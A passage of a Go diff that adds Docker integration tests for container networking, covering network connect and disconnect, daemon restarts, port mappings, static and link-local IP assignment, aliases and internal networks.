+	err = json.Unmarshal(body, &inspect121)
+	c.Assert(err, checker.IsNil)
+	c.Assert(inspect121.NetworkSettings.Networks, checker.HasLen, 3)
+
+	bridge := inspect121.NetworkSettings.Networks["bridge"]
+	c.Assert(bridge.IPAddress, checker.Equals, versionedIP)
+	c.Assert(bridge.IPAddress, checker.Equals, inspect121.NetworkSettings.IPAddress)
+}
+
+func connectContainerToNetworks(c *check.C, d *Daemon, cName string, nws []string) {
+	// Run a container on the default network
+	out, err := d.Cmd("run", "-d", "--name", cName, "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// Attach the container to other networks
+	for _, nw := range nws {
+		out, err = d.Cmd("network", "create", nw)
+		c.Assert(err, checker.IsNil, check.Commentf(out))
+		out, err = d.Cmd("network", "connect", nw, cName)
+		c.Assert(err, checker.IsNil, check.Commentf(out))
+	}
+}
+
+func verifyContainerIsConnectedToNetworks(c *check.C, d *Daemon, cName string, nws []string) {
+	// Verify container is connected to all the networks
+	for _, nw := range nws {
+		out, err := d.Cmd("inspect", "-f", fmt.Sprintf("{{.NetworkSettings.Networks.%s}}", nw), cName)
+		c.Assert(err, checker.IsNil, check.Commentf(out))
+		c.Assert(out, checker.Not(checker.Equals), "<no value>\n")
+	}
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkMultipleNetworksGracefulDaemonRestart(c *check.C) {
+	cName := "bb"
+	nwList := []string{"nw1", "nw2", "nw3"}
+
+	s.d.StartWithBusybox()
+
+	connectContainerToNetworks(c, s.d, cName, nwList)
+	verifyContainerIsConnectedToNetworks(c, s.d, cName, nwList)
+
+	// Reload daemon
+	s.d.Restart()
+
+	_, err := s.d.Cmd("start", cName)
+	c.Assert(err, checker.IsNil)
+
+	verifyContainerIsConnectedToNetworks(c, s.d, cName, nwList)
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkMultipleNetworksUngracefulDaemonRestart(c *check.C) {
+	cName := "cc"
+	nwList := []string{"nw1", "nw2", "nw3"}
+
+	s.d.StartWithBusybox()
+
+	connectContainerToNetworks(c, s.d, cName, nwList)
+	verifyContainerIsConnectedToNetworks(c, s.d, cName, nwList)
+
+	// Kill daemon and restart
+	if err := s.d.cmd.Process.Kill(); err != nil {
+		c.Fatal(err)
+	}
+	s.d.Restart()
+
+	// Restart container
+	_, err := s.d.Cmd("start", cName)
+	c.Assert(err, checker.IsNil)
+
+	verifyContainerIsConnectedToNetworks(c, s.d, cName, nwList)
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkRunNetByID(c *check.C) {
+	out, _ := dockerCmd(c, "network", "create", "one")
+	containerOut, _, err := dockerCmdWithError("run", "-d", "--net", strings.TrimSpace(out), "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(containerOut))
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkHostModeUngracefulDaemonRestart(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	s.d.StartWithBusybox()
+
+	// Run a few containers on host network
+	for i := 0; i < 10; i++ {
+		cName := fmt.Sprintf("hostc-%d", i)
+		out, err := s.d.Cmd("run", "-d", "--name", cName, "--net=host", "--restart=always", "busybox", "top")
+		c.Assert(err, checker.IsNil, check.Commentf(out))
+
+		// verfiy container has finished starting before killing daemon
+		err = s.d.waitRun(cName)
+		c.Assert(err, checker.IsNil)
+	}
+
+	// Kill daemon ungracefully and restart
+	if err := s.d.cmd.Process.Kill(); err != nil {
+		c.Fatal(err)
+	}
+	if err := s.d.Restart(); err != nil {
+		c.Fatal(err)
+	}
+
+	// make sure all the containers are up and running
+	for i := 0; i < 10; i++ {
+		err := s.d.waitRun(fmt.Sprintf("hostc-%d", i))
+		c.Assert(err, checker.IsNil)
+	}
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkConnectToHostFromOtherNetwork(c *check.C) {
+	dockerCmd(c, "run", "-d", "--name", "container1", "busybox", "top")
+	c.Assert(waitRun("container1"), check.IsNil)
+	dockerCmd(c, "network", "disconnect", "bridge", "container1")
+	out, _, err := dockerCmdWithError("network", "connect", "host", "container1")
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, runconfig.ErrConflictHostNetwork.Error())
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkDisconnectFromHost(c *check.C) {
+	dockerCmd(c, "run", "-d", "--name", "container1", "--net=host", "busybox", "top")
+	c.Assert(waitRun("container1"), check.IsNil)
+	out, _, err := dockerCmdWithError("network", "disconnect", "host", "container1")
+	c.Assert(err, checker.NotNil, check.Commentf("Should err out disconnect from host"))
+	c.Assert(out, checker.Contains, runconfig.ErrConflictHostNetwork.Error())
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkConnectWithPortMapping(c *check.C) {
+	testRequires(c, NotArm)
+	dockerCmd(c, "network", "create", "test1")
+	dockerCmd(c, "run", "-d", "--name", "c1", "-p", "5000:5000", "busybox", "top")
+	c.Assert(waitRun("c1"), check.IsNil)
+	dockerCmd(c, "network", "connect", "test1", "c1")
+}
+
+func verifyPortMap(c *check.C, container, port, originalMapping string, mustBeEqual bool) {
+	chk := checker.Equals
+	if !mustBeEqual {
+		chk = checker.Not(checker.Equals)
+	}
+	currentMapping, _ := dockerCmd(c, "port", container, port)
+	c.Assert(currentMapping, chk, originalMapping)
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkConnectDisconnectWithPortMapping(c *check.C) {
+	// Connect and disconnect a container with explicit and non-explicit
+	// host port mapping to/from networks which do cause and do not cause
+	// the container default gateway to change, and verify docker port cmd
+	// returns congruent information
+	testRequires(c, NotArm)
+	cnt := "c1"
+	dockerCmd(c, "network", "create", "aaa")
+	dockerCmd(c, "network", "create", "ccc")
+
+	dockerCmd(c, "run", "-d", "--name", cnt, "-p", "9000:90", "-p", "70", "busybox", "top")
+	c.Assert(waitRun(cnt), check.IsNil)
+	curPortMap, _ := dockerCmd(c, "port", cnt, "70")
+	curExplPortMap, _ := dockerCmd(c, "port", cnt, "90")
+
+	// Connect to a network which causes the container's default gw switch
+	dockerCmd(c, "network", "connect", "aaa", cnt)
+	verifyPortMap(c, cnt, "70", curPortMap, false)
+	verifyPortMap(c, cnt, "90", curExplPortMap, true)
+
+	// Read current mapping
+	curPortMap, _ = dockerCmd(c, "port", cnt, "70")
+
+	// Disconnect from a network which causes the container's default gw switch
+	dockerCmd(c, "network", "disconnect", "aaa", cnt)
+	verifyPortMap(c, cnt, "70", curPortMap, false)
+	verifyPortMap(c, cnt, "90", curExplPortMap, true)
+
+	// Read current mapping
+	curPortMap, _ = dockerCmd(c, "port", cnt, "70")
+
+	// Connect to a network which does not cause the container's default gw switch
+	dockerCmd(c, "network", "connect", "ccc", cnt)
+	verifyPortMap(c, cnt, "70", curPortMap, true)
+	verifyPortMap(c, cnt, "90", curExplPortMap, true)
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkConnectWithMac(c *check.C) {
+	macAddress := "02:42:ac:11:00:02"
+	dockerCmd(c, "network", "create", "mynetwork")
+	dockerCmd(c, "run", "--name=test", "-d", "--mac-address", macAddress, "busybox", "top")
+	c.Assert(waitRun("test"), check.IsNil)
+	mac1 := inspectField(c, "test", "NetworkSettings.Networks.bridge.MacAddress")
+	c.Assert(strings.TrimSpace(mac1), checker.Equals, macAddress)
+	dockerCmd(c, "network", "connect", "mynetwork", "test")
+	mac2 := inspectField(c, "test", "NetworkSettings.Networks.mynetwork.MacAddress")
+	c.Assert(strings.TrimSpace(mac2), checker.Not(checker.Equals), strings.TrimSpace(mac1))
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkInspectCreatedContainer(c *check.C) {
+	dockerCmd(c, "create", "--name", "test", "busybox")
+	networks := inspectField(c, "test", "NetworkSettings.Networks")
+	c.Assert(networks, checker.Contains, "bridge", check.Commentf("Should return 'bridge' network"))
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkRestartWithMultipleNetworks(c *check.C) {
+	dockerCmd(c, "network", "create", "test")
+	dockerCmd(c, "run", "--name=foo", "-d", "busybox", "top")
+	c.Assert(waitRun("foo"), checker.IsNil)
+	dockerCmd(c, "network", "connect", "test", "foo")
+	dockerCmd(c, "restart", "foo")
+	networks := inspectField(c, "foo", "NetworkSettings.Networks")
+	c.Assert(networks, checker.Contains, "bridge", check.Commentf("Should contain 'bridge' network"))
+	c.Assert(networks, checker.Contains, "test", check.Commentf("Should contain 'test' network"))
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkConnectDisconnectToStoppedContainer(c *check.C) {
+	dockerCmd(c, "network", "create", "test")
+	dockerCmd(c, "create", "--name=foo", "busybox", "top")
+	dockerCmd(c, "network", "connect", "test", "foo")
+	networks := inspectField(c, "foo", "NetworkSettings.Networks")
+	c.Assert(networks, checker.Contains, "test", check.Commentf("Should contain 'test' network"))
+
+	// Restart docker daemon to test the config has persisted to disk
+	s.d.Restart()
+	networks = inspectField(c, "foo", "NetworkSettings.Networks")
+	c.Assert(networks, checker.Contains, "test", check.Commentf("Should contain 'test' network"))
+
+	// start the container and test if we can ping it from another container in the same network
+	dockerCmd(c, "start", "foo")
+	c.Assert(waitRun("foo"), checker.IsNil)
+	ip := inspectField(c, "foo", "NetworkSettings.Networks.test.IPAddress")
+	ip = strings.TrimSpace(ip)
+	dockerCmd(c, "run", "--net=test", "busybox", "sh", "-c", fmt.Sprintf("ping -c 1 %s", ip))
+
+	dockerCmd(c, "stop", "foo")
+
+	// Test disconnect
+	dockerCmd(c, "network", "disconnect", "test", "foo")
+	networks = inspectField(c, "foo", "NetworkSettings.Networks")
+	c.Assert(networks, checker.Not(checker.Contains), "test", check.Commentf("Should not contain 'test' network"))
+
+	// Restart docker daemon to test the config has persisted to disk
+	s.d.Restart()
+	networks = inspectField(c, "foo", "NetworkSettings.Networks")
+	c.Assert(networks, checker.Not(checker.Contains), "test", check.Commentf("Should not contain 'test' network"))
+
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkDisconnectContainerNonexistingNetwork(c *check.C) {
+	dockerCmd(c, "network", "create", "test")
+	dockerCmd(c, "run", "--net=test", "-d", "--name=foo", "busybox", "top")
+	networks := inspectField(c, "foo", "NetworkSettings.Networks")
+	c.Assert(networks, checker.Contains, "test", check.Commentf("Should contain 'test' network"))
+
+	// Stop container and remove network
+	dockerCmd(c, "stop", "foo")
+	dockerCmd(c, "network", "rm", "test")
+
+	// Test disconnecting stopped container from nonexisting network
+	dockerCmd(c, "network", "disconnect", "-f", "test", "foo")
+	networks = inspectField(c, "foo", "NetworkSettings.Networks")
+	c.Assert(networks, checker.Not(checker.Contains), "test", check.Commentf("Should not contain 'test' network"))
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkConnectPreferredIP(c *check.C) {
+	// create two networks
+	dockerCmd(c, "network", "create", "--ipv6", "--subnet=172.28.0.0/16", "--subnet=2001:db8:1234::/64", "n0")
+	assertNwIsAvailable(c, "n0")
+
+	dockerCmd(c, "network", "create", "--ipv6", "--subnet=172.30.0.0/16", "--ip-range=172.30.5.0/24", "--subnet=2001:db8:abcd::/64", "--ip-range=2001:db8:abcd::/80", "n1")
+	assertNwIsAvailable(c, "n1")
+
+	// run a container on first network specifying the ip addresses
+	dockerCmd(c, "run", "-d", "--name", "c0", "--net=n0", "--ip", "172.28.99.88", "--ip6", "2001:db8:1234::9988", "busybox", "top")
+	c.Assert(waitRun("c0"), check.IsNil)
+	verifyIPAddressConfig(c, "c0", "n0", "172.28.99.88", "2001:db8:1234::9988")
+	verifyIPAddresses(c, "c0", "n0", "172.28.99.88", "2001:db8:1234::9988")
+
+	// connect the container to the second network specifying an ip addresses
+	dockerCmd(c, "network", "connect", "--ip", "172.30.55.44", "--ip6", "2001:db8:abcd::5544", "n1", "c0")
+	verifyIPAddressConfig(c, "c0", "n1", "172.30.55.44", "2001:db8:abcd::5544")
+	verifyIPAddresses(c, "c0", "n1", "172.30.55.44", "2001:db8:abcd::5544")
+
+	// Stop and restart the container
+	dockerCmd(c, "stop", "c0")
+	dockerCmd(c, "start", "c0")
+
+	// verify requested addresses are applied and configs are still there
+	verifyIPAddressConfig(c, "c0", "n0", "172.28.99.88", "2001:db8:1234::9988")
+	verifyIPAddresses(c, "c0", "n0", "172.28.99.88", "2001:db8:1234::9988")
+	verifyIPAddressConfig(c, "c0", "n1", "172.30.55.44", "2001:db8:abcd::5544")
+	verifyIPAddresses(c, "c0", "n1", "172.30.55.44", "2001:db8:abcd::5544")
+
+	// Still it should fail to connect to the default network with a specified IP (whatever ip)
+	out, _, err := dockerCmdWithError("network", "connect", "--ip", "172.21.55.44", "bridge", "c0")
+	c.Assert(err, checker.NotNil, check.Commentf("out: %s", out))
+	c.Assert(out, checker.Contains, runconfig.ErrUnsupportedNetworkAndIP.Error())
+
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkConnectPreferredIPStoppedContainer(c *check.C) {
+	// create a container
+	dockerCmd(c, "create", "--name", "c0", "busybox", "top")
+
+	// create a network
+	dockerCmd(c, "network", "create", "--ipv6", "--subnet=172.30.0.0/16", "--subnet=2001:db8:abcd::/64", "n0")
+	assertNwIsAvailable(c, "n0")
+
+	// connect the container to the network specifying an ip addresses
+	dockerCmd(c, "network", "connect", "--ip", "172.30.55.44", "--ip6", "2001:db8:abcd::5544", "n0", "c0")
+	verifyIPAddressConfig(c, "c0", "n0", "172.30.55.44", "2001:db8:abcd::5544")
+
+	// start the container, verify config has not changed and ip addresses are assigned
+	dockerCmd(c, "start", "c0")
+	c.Assert(waitRun("c0"), check.IsNil)
+	verifyIPAddressConfig(c, "c0", "n0", "172.30.55.44", "2001:db8:abcd::5544")
+	verifyIPAddresses(c, "c0", "n0", "172.30.55.44", "2001:db8:abcd::5544")
+
+	// stop the container and check ip config has not changed
+	dockerCmd(c, "stop", "c0")
+	verifyIPAddressConfig(c, "c0", "n0", "172.30.55.44", "2001:db8:abcd::5544")
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkUnsupportedRequiredIP(c *check.C) {
+	// requested IP is not supported on predefined networks
+	for _, mode := range []string{"none", "host", "bridge", "default"} {
+		checkUnsupportedNetworkAndIP(c, mode)
+	}
+
+	// requested IP is not supported on networks with no user defined subnets
+	dockerCmd(c, "network", "create", "n0")
+	assertNwIsAvailable(c, "n0")
+
+	out, _, err := dockerCmdWithError("run", "-d", "--ip", "172.28.99.88", "--net", "n0", "busybox", "top")
+	c.Assert(err, checker.NotNil, check.Commentf("out: %s", out))
+	c.Assert(out, checker.Contains, runconfig.ErrUnsupportedNetworkNoSubnetAndIP.Error())
+
+	out, _, err = dockerCmdWithError("run", "-d", "--ip6", "2001:db8:1234::9988", "--net", "n0", "busybox", "top")
+	c.Assert(err, checker.NotNil, check.Commentf("out: %s", out))
+	c.Assert(out, checker.Contains, runconfig.ErrUnsupportedNetworkNoSubnetAndIP.Error())
+
+	dockerCmd(c, "network", "rm", "n0")
+	assertNwNotAvailable(c, "n0")
+}
+
+func checkUnsupportedNetworkAndIP(c *check.C, nwMode string) {
+	out, _, err := dockerCmdWithError("run", "-d", "--net", nwMode, "--ip", "172.28.99.88", "--ip6", "2001:db8:1234::9988", "busybox", "top")
+	c.Assert(err, checker.NotNil, check.Commentf("out: %s", out))
+	c.Assert(out, checker.Contains, runconfig.ErrUnsupportedNetworkAndIP.Error())
+}
+
+func verifyIPAddressConfig(c *check.C, cName, nwname, ipv4, ipv6 string) {
+	if ipv4 != "" {
+		out := inspectField(c, cName, fmt.Sprintf("NetworkSettings.Networks.%s.IPAMConfig.IPv4Address", nwname))
+		c.Assert(strings.TrimSpace(out), check.Equals, ipv4)
+	}
+
+	if ipv6 != "" {
+		out := inspectField(c, cName, fmt.Sprintf("NetworkSettings.Networks.%s.IPAMConfig.IPv6Address", nwname))
+		c.Assert(strings.TrimSpace(out), check.Equals, ipv6)
+	}
+}
+
+func verifyIPAddresses(c *check.C, cName, nwname, ipv4, ipv6 string) {
+	out := inspectField(c, cName, fmt.Sprintf("NetworkSettings.Networks.%s.IPAddress", nwname))
+	c.Assert(strings.TrimSpace(out), check.Equals, ipv4)
+
+	out = inspectField(c, cName, fmt.Sprintf("NetworkSettings.Networks.%s.GlobalIPv6Address", nwname))
+	c.Assert(strings.TrimSpace(out), check.Equals, ipv6)
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkConnectLinkLocalIP(c *check.C) {
+	// create one test network
+	dockerCmd(c, "network", "create", "n0")
+	assertNwIsAvailable(c, "n0")
+
+	// run a container with incorrect link-local address
+	_, _, err := dockerCmdWithError("run", "--link-local-ip", "169.253.5.5", "busybox", "top")
+	c.Assert(err, check.NotNil)
+	_, _, err = dockerCmdWithError("run", "--link-local-ip", "2001:db8::89", "busybox", "top")
+	c.Assert(err, check.NotNil)
+
+	// run two containers with link-local ip on the test network
+	dockerCmd(c, "run", "-d", "--name", "c0", "--net=n0", "--link-local-ip", "169.254.7.7", "--link-local-ip", "fe80::254:77", "busybox", "top")
+	c.Assert(waitRun("c0"), check.IsNil)
+	dockerCmd(c, "run", "-d", "--name", "c1", "--net=n0", "--link-local-ip", "169.254.8.8", "--link-local-ip", "fe80::254:88", "busybox", "top")
+	c.Assert(waitRun("c1"), check.IsNil)
+
+	// run a container on the default network and connect it to the test network specifying a link-local address
+	dockerCmd(c, "run", "-d", "--name", "c2", "busybox", "top")
+	c.Assert(waitRun("c2"), check.IsNil)
+	dockerCmd(c, "network", "connect", "--link-local-ip", "169.254.9.9", "n0", "c2")
+
+	// verify the three containers can ping each other via the link-local addresses
+	_, _, err = dockerCmdWithError("exec", "c0", "ping", "-c", "1", "169.254.8.8")
+	c.Assert(err, check.IsNil)
+	_, _, err = dockerCmdWithError("exec", "c1", "ping", "-c", "1", "169.254.9.9")
+	c.Assert(err, check.IsNil)
+	_, _, err = dockerCmdWithError("exec", "c2", "ping", "-c", "1", "169.254.7.7")
+	c.Assert(err, check.IsNil)
+
+	// Stop and restart the three containers
+	dockerCmd(c, "stop", "c0")
+	dockerCmd(c, "stop", "c1")
+	dockerCmd(c, "stop", "c2")
+	dockerCmd(c, "start", "c0")
+	dockerCmd(c, "start", "c1")
+	dockerCmd(c, "start", "c2")
+
+	// verify the ping again
+	_, _, err = dockerCmdWithError("exec", "c0", "ping", "-c", "1", "169.254.8.8")
+	c.Assert(err, check.IsNil)
+	_, _, err = dockerCmdWithError("exec", "c1", "ping", "-c", "1", "169.254.9.9")
+	c.Assert(err, check.IsNil)
+	_, _, err = dockerCmdWithError("exec", "c2", "ping", "-c", "1", "169.254.7.7")
+	c.Assert(err, check.IsNil)
+}
+
+func (s *DockerSuite) TestUserDefinedNetworkConnectDisconnectLink(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm)
+	dockerCmd(c, "network", "create", "-d", "bridge", "foo1")
+	dockerCmd(c, "network", "create", "-d", "bridge", "foo2")
+
+	dockerCmd(c, "run", "-d", "--net=foo1", "--name=first", "busybox", "top")
+	c.Assert(waitRun("first"), check.IsNil)
+
+	// run a container in a user-defined network with a link for an existing container
+	// and a link for a container that doesn't exist
+	dockerCmd(c, "run", "-d", "--net=foo1", "--name=second", "--link=first:FirstInFoo1",
+		"--link=third:bar", "busybox", "top")
+	c.Assert(waitRun("second"), check.IsNil)
+
+	// ping to first and its alias FirstInFoo1 must succeed
+	_, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
+	c.Assert(err, check.IsNil)
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "FirstInFoo1")
+	c.Assert(err, check.IsNil)
+
+	// connect first container to foo2 network
+	dockerCmd(c, "network", "connect", "foo2", "first")
+	// connect second container to foo2 network with a different alias for first container
+	dockerCmd(c, "network", "connect", "--link=first:FirstInFoo2", "foo2", "second")
+
+	// ping the new alias in network foo2
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "FirstInFoo2")
+	c.Assert(err, check.IsNil)
+
+	// disconnect first container from foo1 network
+	dockerCmd(c, "network", "disconnect", "foo1", "first")
+
+	// link in foo1 network must fail
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "FirstInFoo1")
+	c.Assert(err, check.NotNil)
+
+	// link in foo2 network must succeed
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "FirstInFoo2")
+	c.Assert(err, check.IsNil)
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkDisconnectDefault(c *check.C) {
+	netWorkName1 := "test1"
+	netWorkName2 := "test2"
+	containerName := "foo"
+
+	dockerCmd(c, "network", "create", netWorkName1)
+	dockerCmd(c, "network", "create", netWorkName2)
+	dockerCmd(c, "create", "--name", containerName, "busybox", "top")
+	dockerCmd(c, "network", "connect", netWorkName1, containerName)
+	dockerCmd(c, "network", "connect", netWorkName2, containerName)
+	dockerCmd(c, "network", "disconnect", "bridge", containerName)
+
+	dockerCmd(c, "start", containerName)
+	c.Assert(waitRun(containerName), checker.IsNil)
+	networks := inspectField(c, containerName, "NetworkSettings.Networks")
+	c.Assert(networks, checker.Contains, netWorkName1, check.Commentf(fmt.Sprintf("Should contain '%s' network", netWorkName1)))
+	c.Assert(networks, checker.Contains, netWorkName2, check.Commentf(fmt.Sprintf("Should contain '%s' network", netWorkName2)))
+	c.Assert(networks, checker.Not(checker.Contains), "bridge", check.Commentf("Should not contain 'bridge' network"))
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkConnectWithAliasOnDefaultNetworks(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm)
+
+	defaults := []string{"bridge", "host", "none"}
+	out, _ := dockerCmd(c, "run", "-d", "--net=none", "busybox", "top")
+	containerID := strings.TrimSpace(out)
+	for _, net := range defaults {
+		res, _, err := dockerCmdWithError("network", "connect", "--alias", "alias"+net, net, containerID)
+		c.Assert(err, checker.NotNil)
+		c.Assert(res, checker.Contains, runconfig.ErrUnsupportedNetworkAndAlias.Error())
+	}
+}
+
+func (s *DockerSuite) TestUserDefinedNetworkConnectDisconnectAlias(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm)
+	dockerCmd(c, "network", "create", "-d", "bridge", "net1")
+	dockerCmd(c, "network", "create", "-d", "bridge", "net2")
+
+	cid, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=first", "--net-alias=foo", "busybox", "top")
+	c.Assert(waitRun("first"), check.IsNil)
+
+	dockerCmd(c, "run", "-d", "--net=net1", "--name=second", "busybox", "top")
+	c.Assert(waitRun("second"), check.IsNil)
+
+	// ping first container and its alias
+	_, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
+	c.Assert(err, check.IsNil)
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo")
+	c.Assert(err, check.IsNil)
+
+	// ping first container's short-id alias
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", stringid.TruncateID(cid))
+	c.Assert(err, check.IsNil)
+
+	// connect first container to net2 network
+	dockerCmd(c, "network", "connect", "--alias=bar", "net2", "first")
+	// connect second container to foo2 network with a different alias for first container
+	dockerCmd(c, "network", "connect", "net2", "second")
+
+	// ping the new alias in network foo2
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "bar")
+	c.Assert(err, check.IsNil)
+
+	// disconnect first container from net1 network
+	dockerCmd(c, "network", "disconnect", "net1", "first")
+
+	// ping to net1 scoped alias "foo" must fail
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo")
+	c.Assert(err, check.NotNil)
+
+	// ping to net2 scoped alias "bar" must still succeed
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "bar")
+	c.Assert(err, check.IsNil)
+	// ping to net2 scoped alias short-id must still succeed
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", stringid.TruncateID(cid))
+	c.Assert(err, check.IsNil)
+
+	// verify the alias option is rejected when running on predefined network
+	out, _, err := dockerCmdWithError("run", "--rm", "--name=any", "--net-alias=any", "busybox", "top")
+	c.Assert(err, checker.NotNil, check.Commentf("out: %s", out))
+	c.Assert(out, checker.Contains, runconfig.ErrUnsupportedNetworkAndAlias.Error())
+
+	// verify the alias option is rejected when connecting to predefined network
+	out, _, err = dockerCmdWithError("network", "connect", "--alias=any", "bridge", "first")
+	c.Assert(err, checker.NotNil, check.Commentf("out: %s", out))
+	c.Assert(out, checker.Contains, runconfig.ErrUnsupportedNetworkAndAlias.Error())
+}
+
+func (s *DockerSuite) TestUserDefinedNetworkConnectivity(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	dockerCmd(c, "network", "create", "-d", "bridge", "br.net1")
+
+	dockerCmd(c, "run", "-d", "--net=br.net1", "--name=c1.net1", "busybox", "top")
+	c.Assert(waitRun("c1.net1"), check.IsNil)
+
+	dockerCmd(c, "run", "-d", "--net=br.net1", "--name=c2.net1", "busybox", "top")
+	c.Assert(waitRun("c2.net1"), check.IsNil)
+
+	// ping first container by its unqualified name
+	_, _, err := dockerCmdWithError("exec", "c2.net1", "ping", "-c", "1", "c1.net1")
+	c.Assert(err, check.IsNil)
+
+	// ping first container by its qualified name
+	_, _, err = dockerCmdWithError("exec", "c2.net1", "ping", "-c", "1", "c1.net1.br.net1")
+	c.Assert(err, check.IsNil)
+
+	// ping with first qualified name masked by an additional domain. should fail
+	_, _, err = dockerCmdWithError("exec", "c2.net1", "ping", "-c", "1", "c1.net1.br.net1.google.com")
+	c.Assert(err, check.NotNil)
+}
+
+func (s *DockerSuite) TestEmbeddedDNSInvalidInput(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	dockerCmd(c, "network", "create", "-d", "bridge", "nw1")
+
+	// Sending garbage to embedded DNS shouldn't crash the daemon
+	dockerCmd(c, "run", "-i", "--net=nw1", "--name=c1", "debian:jessie", "bash", "-c", "echo InvalidQuery > /dev/udp/127.0.0.11/53")
+}
+
+func (s *DockerSuite) TestDockerNetworkConnectFailsNoInspectChange(c *check.C) {
+	dockerCmd(c, "run", "-d", "--name=bb", "busybox", "top")
+	c.Assert(waitRun("bb"), check.IsNil)
+
+	ns0 := inspectField(c, "bb", "NetworkSettings.Networks.bridge")
+
+	// A failing redundant network connect should not alter current container's endpoint settings
+	_, _, err := dockerCmdWithError("network", "connect", "bridge", "bb")
+	c.Assert(err, check.NotNil)
+
+	ns1 := inspectField(c, "bb", "NetworkSettings.Networks.bridge")
+	c.Assert(ns1, check.Equals, ns0)
+}
+
+func (s *DockerSuite) TestDockerNetworkInternalMode(c *check.C) {
+	dockerCmd(c, "network", "create", "--driver=bridge", "--internal", "internal")
+	assertNwIsAvailable(c, "internal")
+	nr := getNetworkResource(c, "internal")
+	c.Assert(nr.Internal, checker.True)
+
+	dockerCmd(c, "run", "-d", "--net=internal", "--name=first", "busybox", "top")
+	c.Assert(waitRun("first"), check.IsNil)
+	dockerCmd(c, "run", "-d", "--net=internal", "--name=second", "busybox", "top")
+	c.Assert(waitRun("second"), check.IsNil)
+	out, _, err := dockerCmdWithError("exec", "first", "ping", "-W", "4", "-c", "1", "www.google.com")
+	c.Assert(err, check.NotNil)
+	c.Assert(out, checker.Contains, "ping: bad address")
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
+	c.Assert(err, check.IsNil)
+}
+
+// Test for #21401
+func (s *DockerNetworkSuite) TestDockerNetworkCreateDeleteSpecialCharacters(c *check.C) {
+	dockerCmd(c, "network", "create", "test@#$")
+	assertNwIsAvailable(c, "test@#$")
+	dockerCmd(c, "network", "rm", "test@#$")
+	assertNwNotAvailable(c, "test@#$")
+
+	dockerCmd(c, "network", "create", "kiwl$%^")
+	assertNwIsAvailable(c, "kiwl$%^")
+	dockerCmd(c, "network", "rm", "kiwl$%^")
+	assertNwNotAvailable(c, "kiwl$%^")
+}
+
+func (s *DockerDaemonSuite) TestDaemonRestartRestoreBridgeNetwork(t *check.C) {
+	testRequires(t, DaemonIsLinux)
+	if err := s.d.StartWithBusybox("--live-restore"); err != nil {
+		t.Fatal(err)
+	}
+	defer s.d.Stop()
+	oldCon := "old"
+
+	_, err := s.d.Cmd("run", "-d", "--name", oldCon, "-p", "80:80", "busybox", "top")
+	if err != nil {
+		t.Fatal(err)
+	}
+	oldContainerIP, err := s.d.Cmd("inspect", "-f", "{{ .NetworkSettings.Networks.bridge.IPAddress }}", oldCon)
+	if err != nil {
+		t.Fatal(err)
+	}
+	// Kill the daemon
+	if err := s.d.Kill(); err != nil {
+		t.Fatal(err)
+	}
+
+	// restart the daemon
+	if err := s.d.Start("--live-restore"); err != nil {
+		t.Fatal(err)
+	}
+
+	// start a new container, the new container's ip should not be the same with
+	// old running container.
+	newCon := "new"
+	_, err = s.d.Cmd("run", "-d", "--name", newCon, "busybox", "top")
+	if err != nil {
+		t.Fatal(err)
+	}
+	newContainerIP, err := s.d.Cmd("inspect", "-f", "{{ .NetworkSettings.Networks.bridge.IPAddress }}", newCon)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if strings.Compare(strings.TrimSpace(oldContainerIP), strings.TrimSpace(newContainerIP)) == 0 {
+		t.Fatalf("new container ip should not equal to old running container  ip")
+	}
+
+	// start a new container, the new container should ping old running container
+	_, err = s.d.Cmd("run", "-t", "busybox", "ping", "-c", "1", oldContainerIP)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// start a new container, trying to publish port 80:80 should fail
+	out, err := s.d.Cmd("run", "-p", "80:80", "-d", "busybox", "top")
+	if err == nil || !strings.Contains(out, "Bind for 0.0.0.0:80 failed: port is already allocated") {
+		t.Fatalf("80 port is allocated to old running container, it should failed on allocating to new container")
+	}
+
+	// kill old running container and try to allocate again
